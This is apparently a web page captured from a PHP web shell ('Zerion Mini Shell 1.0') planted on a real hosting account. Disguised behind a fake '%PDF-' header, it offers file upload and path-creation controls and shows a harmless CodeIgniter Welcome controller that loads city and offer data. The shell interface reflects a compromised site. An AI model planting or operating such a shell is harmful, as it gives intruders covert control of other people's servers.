%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/ugotscom/www/boniface/application/modules/Welcome/controllers/
Upload File :
Create Path :
Current File : /home/ugotscom/www/boniface/application/modules/Welcome/controllers/Welcome.php

<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class Welcome extends CI_Controller {

 function __construct(){
    parent::__construct();

  
      $this->load->model('welcome_model'); //load model crud_model
  }

	public function index()
	{
	   $data['cities']=$this->welcome_model->cities();
       $data['icities']=$this->welcome_model->icities();
$data['offers']=$this->welcome_model->offers();
		$this->load->view('welcome',$data);
	}

 
}

 

Zerion Mini Shell 1.0